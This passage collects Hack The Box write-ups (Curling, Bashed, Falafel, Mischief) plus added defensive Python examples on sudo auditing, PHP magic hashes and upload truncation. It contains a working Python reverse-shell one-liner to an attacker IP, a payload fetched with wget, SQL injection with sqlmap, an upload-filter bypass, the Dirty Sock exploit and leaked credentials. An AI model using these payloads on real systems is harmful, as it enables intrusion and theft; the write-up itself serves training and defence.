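        hex_field = line.split(":", 1)[1][1:1 + hex_width]
        out += bytes.fromhex(hex_field.replace(" ", ""))
    return bytes(out)


def unwrap(blob: bytes):
    """Peel compression and archive layers by magic bytes until plain data remains.
    Returns (layer names outermost first, innermost bytes)."""
    layers = []
    data = blob
    while True:
        if data.startswith(b"BZh"):
            layers.append("bzip2")
            data = bz2.decompress(data)
        elif data.startswith(b"\x1f\x8b"):
            layers.append("gzip")
            data = gzip.decompress(data)
        elif len(data) > 262 and data[257:262] == b"ustar":
            layers.append("tar")
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
                member = next(m for m in tar.getmembers() if m.isfile())
                data = tar.extractfile(member).read()
        else:
            layers.append("plain")
            return layers, data


if __name__ == "__main__":
    dump = to_xxd(build_sample_blob())
    layers, secret = unwrap(from_xxd(dump))
    print(" -> ".join(layers), secret)
```

Keying on magic bytes rather than on file extensions is the point: the file on the box had no extension at all, and each layer only announced itself through its first bytes (BZh for bzip2, 1f 8b for gzip, the "ustar" string at offset 257 for tar).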

Let’s ssh in as floris:

And we own user!


Curling

Looking at the /home directory of floris again:

There’s a directory called admin-area which contains two files:

input and report

input:

url = "http://127.0.0.1"

report:

It’s obvious that this is the output of running curl on http://127.0.0.1:

Even the name of the box, curling, is a hint. So what about changing that url from localhost to something else, like a file? The next time the command gets executed we will get the contents of that file, maybe root.txt? But only if it’s being executed by root. Let’s try and see if it works:

Then we run watch cat report, which executes cat report every 2 seconds and shows us the output, easier than checking manually:

After some time we get the flag.


Dirty Sock? Root shell!

I didn’t like the fact that I could only read the flag; I wanted a root shell. So I tried for a long time to bypass the url thing and get a reverse shell, but couldn’t. Then when I did this box again for the write-up, one of the things that caught my attention is that we are on an Ubuntu box, so I checked the snap version to know if it’s vulnerable to CVE-2019-7304, known as Dirty Sock, and of course it was:

This is not intended at all, because by the time this box was released, CVE-2019-7304 wasn’t disclosed yet.

I got the exploit from here, then hosted it on a Python simple HTTP server and downloaded it on the box:

python3 dirty_sockv2.py 

Now we can su to dirty_sock and execute commands as root:

Or just sudo su and we get a root shell:

HTB – Bashed

Today we are going to solve the CTF challenge “Bashed”. It is a lab developed by Hack the Box, who have an amazing collection of online labs on which you can practice your penetration testing skills, designed for beginner to expert penetration testers. Bashed is a retired lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, they have a static IP. Bashed has IP: 10.10.10.68.

Now, as always let’s begin our hacking with the port enumeration.

C:\Users\jacco>nmap -sC -sV 10.10.10.68
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 18:45 W. Europe Summer Time
Nmap scan report for 10.10.10.68
Host is up (0.030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds

Next, we use wfuzz to enumerate directories and find some interesting ones such as /dev:

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000018: C=404 9 L 32 W 279 Ch "2006"
000019: C=404 9 L 32 W 279 Ch "news"
000013: C=200 161 L 397 W 7745 Ch "#"
000014: C=200 161 L 397 W 7745 Ch ""
000015: C=404 9 L 32 W 280 Ch "index"
000016: C=301 9 L 28 W 311 Ch "images"
000017: C=404 9 L 32 W 283 Ch "download"
000020: C=404 9 L 32 W 280 Ch "crack"
000021: C=404 9 L 32 W 281 Ch "serial"
000022: C=404 9 L 32 W 280 Ch "warez"
000023: C=404 9 L 32 W 279 Ch "full"
000030: C=404 9 L 32 W 277 Ch "11"
Finishing pending requests...
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000013: C=200 161 L 397 W 7745 Ch "#"
000016: C=301 9 L 28 W 311 Ch "images"
000012: C=200 161 L 397 W 7745 Ch "# on atleast 2 different hosts"
000014: C=200 161 L 397 W 7745 Ch ""
000164: C=301 9 L 28 W 312 Ch "uploads"
000338: C=301 9 L 28 W 308 Ch "php"
000550: C=301 9 L 28 W 308 Ch "css"
000834: C=301 9 L 28 W 308 Ch "dev"
000953: C=301 9 L 28 W 307 Ch "js"
002771: C=301 9 L 28 W 310 Ch "fonts"
044769: C=
Finishing pending requests...

When you open the /dev directory in the browser, you get a link to phpbash.php. Click on that link.

It redirects to the page shown below, which is a shell interacting through the browser.

After that you can execute arbitrary OS commands to test whether it works. We ran ls to list the current directory.

We execute the following command in phpbash to get a reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 60876: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@bashed:/var/www/html/dev$ cd /home
cd /home
www-data@bashed:/home$ ls
ls
arrexel scriptmanager
www-data@bashed:/home$ cd arrexel
cd arrexel
www-data@bashed:/home/arrexel$ cat user.txt
cat user.txt
2c2*****fc1
www-data@bashed:/home/arrexel$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i
sudo -u scriptmanager bash -i
scriptmanager@bashed:~$ wget http://10.10.14.20/puckshell.py
wget http://10.10.14.20/puckshell.py
--2019-04-03 09:35:59-- http://10.10.14.20/puckshell.py
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 213 [text/plain]
Saving to: 'puckshell.py'

puckshell.py 100%[===================>] 213 --.-KB/s in 0s

2019-04-03 09:35:59 (30.4 MB/s) - 'puckshell.py' saved [213/213]
scriptmanager@bashed:~$ cp puckshell.py /scripts/puckshell.py
cp puckshell.py /scripts/puckshell.py
scriptmanager@bashed:~$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 20
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  3 09:43 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  213 Apr  3 09:43 puckshell.py
-rw-r--r--  1 scriptmanager scriptmanager    0 Apr  2 08:50 test.py
-rw-r--r--  1 scriptmanager scriptmanager   58 Apr  2 08:50 test.py.bak
-rw-r--r--  1 root          root            12 Apr  2 08:50 test.txt
scriptmanager@bashed:/scripts$ cat puckshell.py
cat puckshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
scriptmanager@bashed:/scripts$

We catch it on our listener:
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 51794: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
cc4*****8e2
#
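Two of the privilege escalations on this page come from sudoers rules: TartarSauce lets www-data run tar as onuma without a password, and tar's --checkpoint-action=exec= runs an arbitrary program; Bashed grants scriptmanager ALL with NOPASSWD, as the sudo -l output above shows. The script below is an added example, not part of the writeup: it parses sudo -l output and flags the rule properties an auditor looks for (NOPASSWD, ALL, a run-as of root, or a command whose own options can start another program). The sample text is constructed in the format shown above; it contains the Bashed entry plus two made-up lines, and the list of shell-capable binaries is deliberately short.

```python
import re
from posixpath import basename

# Binaries whose own options can start another program. The tar entry is the
# mechanism used in the TartarSauce section; the list is constructed and not exhaustive.
SHELL_CAPABLE = {
    "tar": "--checkpoint-action=exec=",
    "bash": "is itself a shell",
    "sh": "is itself a shell",
    "python": "interpreter (can spawn a pty, as above)",
    "python3": "interpreter (can spawn a pty, as above)",
}

# One rule line of `sudo -l` output: "(runas_user[ : runas_group]) [TAG: ...] command[, command]".
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<commands>.+)$")

# Constructed sample in the format shown above: the Bashed entry plus two made-up lines.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
    (onuma) NOPASSWD: /bin/tar
    (root) /usr/bin/apt-get update
"""


def parse_rules(text: str) -> list:
    """Extract (runas_user, tag set, [commands]) tuples from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        match = RULE_RE.match(line.strip())
        if not match:
            continue
        # "(user : group)" -> keep the user part only.
        runas_user = match.group("runas").split(":")[0].strip()
        tags = {t.strip() for t in match.group("tags").split(":") if t.strip()}
        commands = [c.strip() for c in match.group("commands").split(",")]
        rules.append((runas_user, tags, commands))
    return rules


def audit(text: str) -> list:
    """Return (runas_user, command, [finding tags]) for every command in every rule."""
    findings = []
    for runas_user, tags, commands in parse_rules(text):
        for command in commands:
            found = []
            if runas_user in {"root", "ALL"}:
                found.append("runs_as_root")
            if "NOPASSWD" in tags:
                found.append("nopasswd")
            if command == "ALL":
                found.append("all_commands")
            else:
                program = basename(command.split()[0])
                if program in SHELL_CAPABLE:
                    found.append(f"shell_capable:{program}")
            findings.append((runas_user, command, found))
    return findings


if __name__ == "__main__":
    for runas_user, command, found in audit(SAMPLE_SUDO_L):
        print(f"({runas_user}) {command}: {', '.join(found) or 'no finding'}")
```

A rule that is flagged both nopasswd and shell_capable is the TartarSauce case: the intent was "let this account archive files", but tar's checkpoint action turns the grant into "run anything as onuma". Restricting the rule to a wrapper script with fixed arguments, rather than to the tar binary itself, removes that option surface.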

Author: Jacco Straathof

HTB – Falafel

Today we are going to solve another CTF challenge, “Falafel”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Falafel is a retired vulnerable lab presented by Hack the Box for online penetration practice according to your experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Hard

Task: find the user.txt & root.txt files on the victim’s machine

Since these labs are available online, they have a static IP; Falafel’s IP is 10.10.10.73, so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.73
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 14:26 W. Europe Summer Time
Nmap scan report for 10.10.10.73
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds

We browsed to the target IP and were presented with the login page shown below.

Enumeration

With the information from robots.txt, let’s brute-force for .txt files that might give us some useful information.

root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60 http://10.10.10.73/FUZZ.txt
********************************************************
* Wfuzz 2.1.5 - The Web Bruteforcer                      *
********************************************************

Target: http://10.10.10.73/FUZZ.txt
Total requests: 207643

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

01347:  C=200      1 L	       4 W	     30 Ch	  "robots"
06064:  C=200     17 L	     120 W	    804 Ch	  "cyberlaw"

Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926

Let’s check cyberlaw.txt

From this message I conclude that there is an admin account with a serious security issue: an attacker could take over the website through the image upload feature. There is also a hint about the URL filter.

We can also fuzz the login form for valid usernames:

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000003: C=200 102 L 657 W 7074 Ch "Aaron"
000004: C=200 102 L 657 W 7074 Ch "Aartjan"
000005: C=200 102 L 657 W 7074 Ch "Abagael"
000006: C=200 102 L 657 W 7074 Ch "Abagail"
000007: C=200 102 L 657 W 7074 Ch "Abahri"
^C
Finishing pending requests...

Every name in the first run returns a 657-word page, so we rerun with --hw 657 to hide those responses and show only the usernames that make the application respond differently:
root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000065:  C=200    102 L	     659 W	   7091 Ch	  "Admin"
001488:  C=200    102 L	     659 W	   7091 Ch	  "Chris"

Total time: 37.51125
Processed Requests: 8607
Filtered Requests: 8605
Requests/sec.: 229.4511

The next thing to try is a check for SQL injection. To test it, we insert the following string as the username:

and press the login button with a random password. The web page answers “Wrong identification: admin”, but we never entered “admin” in the login form, so there is SQL injection!

Exploiting Web Application Vulnerabilities

We then take the SQL injection further with sqlmap, using “Wrong identification” as the string that identifies a true response from the login page.

c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
        sqlmap {1.2.11.19#dev}  http://sqlmap.org

[*] starting @ 14:59:45 /2019-04-02/

--snip--
back-end DBMS: MySQL 5
[14:59:46] [INFO] fetching tables for database: 'falafel'
[14:59:46] [INFO] fetching number of tables for database 'falafel'
[14:59:46] [INFO] resumed: 1
[14:59:46] [INFO] resumed: users
Database: falafel
[1 table]
+-------+
| users |
+-------+

[*] ending @ 14:59:46 /2019-04-02/
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch
        sqlmap {1.2.11.19#dev}  http://sqlmap.org

[*] starting @ 15:01:18 /2019-04-02/

[15:01:18] [INFO] testing connection to the target URL
--snip--
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: falafel
Table: users
[2 entries]
+----+--------+----------+----------------------------------+
| ID | role   | username | password                         |
+----+--------+----------+----------------------------------+
| 1  | admin  | admin    | 0e462096931906507119562988736854 |
| 2  | normal | chris    | d4ee02a22fc872e36d9e3751ba72ddc8 |
+----+--------+----------+----------------------------------+

[*] ending @ 15:01:19 /2019-04-02/

As you can observe, the password hash for user admin starts with 0e. I didn’t know much about this type of hash, so a Google search led to the article on Magic Hashes.

As you can observe, the highlighted MD5 hash of the 32-character string is another 0e-form hash, which PHP’s loose comparison treats as equal to the one above.
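The weakness behind the magic hash, as an added example that is not part of the original write-up and not the box’s login code: a Python emulation of PHP’s loose == rule for numeric strings, showing why a second hash of the 0e form compares equal to the stored admin hash, and the strict comparison (=== or hash_equals() in PHP) that closes the hole. The stored hash is the one dumped above; the second 0e-form hash and the test password are constructed.

```python
import hashlib
import hmac
import re

# Admin hash as dumped from the falafel.users table.
STORED_ADMIN_HASH = "0e462096931906507119562988736854"

# Shape of a PHP "numeric string": optional sign, digits with an optional
# fraction, optional exponent. "0e462..." matches, so PHP reads it as the
# number 0 * 10^462... , i.e. zero.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def is_php_numeric_string(s: str) -> bool:
    """True when PHP would treat the string as a number in a loose comparison."""
    return bool(_PHP_NUMERIC.match(s))


def php_loose_equals(a: str, b: str) -> bool:
    """Emulate PHP's == on two strings: if both look numeric, compare as numbers."""
    if is_php_numeric_string(a) and is_php_numeric_string(b):
        return float(a) == float(b)   # "0e..." == "0e..." -> 0.0 == 0.0 -> True
    return a == b


def php_strict_equals(a: str, b: str) -> bool:
    """Emulate PHP's === / hash_equals(): byte-for-byte, in constant time."""
    return hmac.compare_digest(a.encode(), b.encode())


def loose_login(stored_hash: str, password: str) -> bool:
    """The vulnerable pattern: if (md5($password) == $row['password'])."""
    candidate = hashlib.md5(password.encode()).hexdigest()
    return php_loose_equals(candidate, stored_hash)


def strict_login(stored_hash: str, password: str) -> bool:
    """The fixed pattern: if (hash_equals($row['password'], md5($password)))."""
    candidate = hashlib.md5(password.encode()).hexdigest()
    return php_strict_equals(stored_hash, candidate)


if __name__ == "__main__":
    # Constructed second 0e-form hash: loose compare says "same password".
    other_magic = "0e830400451993494058024219903391"
    print("loose :", php_loose_equals(STORED_ADMIN_HASH, other_magic))   # True
    print("strict:", php_strict_equals(STORED_ADMIN_HASH, other_magic))  # False
```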

With this credential we log in to the admin dashboard and move to the upload option.

Here we try to upload a PHP file named shell.php, but it returns the error “Bad extension” as shown.

We then rename it shell.php.png and try the upload again.

Yes! The file with the .png extension uploads successfully into /var/www/html/uploads, so we can upload a PHP file or backdoor with a .png extension.

Spawning Shell

Let’s create a PHP payload for uploading into the web site.

As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.

Trying very long filenames, I noticed the web app truncates the filename saved on disk to a maximum of 236 characters. With this logic we can create a file with a 240-character filename whose last 8 characters are “.php.png”. Because of the truncation, the last four characters “.png” are cut off, which leaves us with a file having a “.php” extension.

Sample filename:

verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png
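The truncation bug in code, as an added example that is not the box’s upload.php (which we never see): a Python model of an upload handler that validates the extension of the original name and only then cuts the name down to 236 characters, beside a hardened handler that builds the on-disk name from the validated extension so truncation can never change it. The 236-character limit and the “.php.png” trick are from the write-up; the function names and the allow-list are assumptions.

```python
import os
import secrets

MAX_STORED_NAME = 236                                # limit observed on the box
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}   # assumed image allow-list
EXECUTABLE_EXTENSIONS = {"php", "phtml", "phar"}     # what the web server hands to PHP


def extension_of(name: str) -> str:
    """Last dot-separated component of the basename, lower-cased; '' if no dot."""
    base = os.path.basename(name)
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def vulnerable_stored_name(upload_name: str) -> str:
    """Check the extension first, then truncate: the order is the bug."""
    if extension_of(upload_name) not in ALLOWED_EXTENSIONS:
        raise ValueError("Bad extension")
    # Truncation happens after validation, so a 240-char "....php.png"
    # name is stored as "....php".
    return upload_name[:MAX_STORED_NAME]


def safe_stored_name(upload_name: str) -> str:
    """Validate, then derive the on-disk name from the validated extension only."""
    ext = extension_of(upload_name)
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("Bad extension")
    # Random basename: no client-controlled characters, and the length is
    # fixed far below the cap, so no later truncation can alter the extension.
    return f"{secrets.token_hex(16)}.{ext}"


def would_execute(stored_name: str) -> bool:
    """True when the web server would treat the stored file as PHP code."""
    return extension_of(stored_name) in EXECUTABLE_EXTENSIONS


# Constructed input: 240 characters ending in ".php.png", as in the write-up.
CRAFTED_NAME = "a" * 232 + ".php.png"

if __name__ == "__main__":
    stored = vulnerable_stored_name(CRAFTED_NAME)
    print("vulnerable stores:", stored[-8:], "executes:", would_execute(stored))
    stored = safe_stored_name(CRAFTED_NAME)
    print("hardened stores:  ", stored, "executes:", would_execute(stored))
```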

Let’s prepare a PHP reverse shell with a long, long file name and host it using Python’s SimpleHTTPServer:

root@kali:~/htb/falafel# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.73 - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -

Triggering the reverse shell via curl:

root@kali:~/htb/falafel# curl "http://10.10.10.73/uploads/0402-1710_61cb5b7a8480bfc4/verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php"

Netcat listener receiving the reverse shell connection:

root@kali:~/htb/falafel# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.73.
Ncat: Connection from 10.10.10.73:53576.
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
17:14:07 up 1 day, 16:59, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 Mon00 40:59m 0.15s 0.09s -bash
moshe pts/0 10.10.14.20 15:21 1:52m 0.00s 0.00s -sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@falafel:/$

We open the passwd file and notice two system usernames, yossi and moshe.

www-data@falafel:/$ cd /var/www/html
cd /var/www/html
www-data@falafel:/var/www/html$ ls
ls
assets cyberlaw.txt images login_logic.php style.php
authorized.php footer.php index.php logout.php upload.php
connection.php header.php js profile.php uploads
css icon.png login.php robots.txt
www-data@falafel:/var/www/html$ cat connection.php 
cat connection.php
<?php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
www-data@falafel:/var/www/html$

This is the MySQL connection file; the username is moshe and the password is falafelIsReallyTasty.

With this credential we try an SSH login; after logging in successfully we find user.txt inside /home/moshe.

PS C:\Users\jacco> ssh moshe@10.10.10.73
moshe@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 2 15:21:50 2019 from 10.10.14.20
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
setterm: terminal xterm-256color does not support --blank
moshe@falafel:~$ ls
user.txt
moshe@falafel:~$ cat user.txt
c86*****9d3

After some more enumeration, we listed the groups for user moshe and found that the user is in the video group. Members of the video group can read the frame-buffer device files (/dev/fb*), and a local user who can access the frame buffer can use that to escalate privileges on the system, so the frame-buffer device is the next thing to check.

Let’s dump the contents of /dev/fb0 with cat to capture the raw framebuffer data into /tmp as screen.raw.

Now that the raw data is captured in /tmp, we need to convert the raw image to a standard format such as .png, but first we need the screen dimensions; the following command prints them:

Now enter the following command to convert the raw data into a .png image:

We then open screen.png and get the following image, which shows the password MoshePlzStopHackingMe! for user yossi.

With this credential we log in over SSH successfully. yossi is a member of the disk group, which gives raw read access to the block device, so we run debugfs on /dev/sda1 to read root’s SSH RSA key straight from the filesystem:

PS C:\Users\jacco> ssh yossi@10.10.10.73
yossi@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr  2 15:16:20 2019 from 10.10.14.20
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
debugfs:  cat /root/root.txt
23b*****fa1
debugfs:

HTB – Mischief

Today we are going to solve another CTF challenge, “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box for helping pentesters perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: To find user.txt and root.txt file

Let’s start off with our nmap version and script scan (-sV -sC) to find out the open ports and services.

c:\Users\jacco>nmap -sV -sC 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:54 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
| 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

As you can observe, we didn’t obtain much information here, so I next scan UDP ports, which shows port 161 open for SNMP.

c:\Users\jacco>nmap -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:57 W. Europe Summer Time
Nmap scan report for 10.10.10.92
Host is up (0.029s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
161/udp open snmp

Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds

Knowing that SNMP is enabled, I run the nmap SNMP scripts for enumeration.

root@kali:~/htb/mischief# nmap -p161 -sC -sV -sU 10.10.10.92
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:03 EDT
Nmap scan report for 10.10.10.92
Host is up (0.028s latency).

PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: b6a9f84e18fef95a00000000
| snmpEngineBoots: 19
|_ snmpEngineTime: 9h48m31s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 0.00 Kb sent, 0.00 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.10.10.92 Netmask: 255.255.255.0
| MAC address: 00:50:56:b9:80:1c (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 2.17 Mb sent, 1.58 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:3366 0.0.0.0:0
| TCP 10.10.10.92:22 10.10.14.20:15739
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:42621 *:*
|_ UDP 127.0.0.53:53 *:*
| snmp-processes: 
| 1: 
| Name: systemd
| Path: /sbin/init
| Params: maybe-ubiquity
| 2: 
| Name: kthreadd
--snip--
| 591: 
| Name: sh
| Path: /bin/sh
| Params: -c /home/loki/hosted/webstart.sh
| 594: 
| Name: sh
| Path: /bin/sh
| Params: /home/loki/hosted/webstart.sh
| 595: 
| Name: python
| Path: python
| Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/
| 617: 
| Name: sshd
| Path: /usr/sbin/sshd
| Params: -D
--snip--
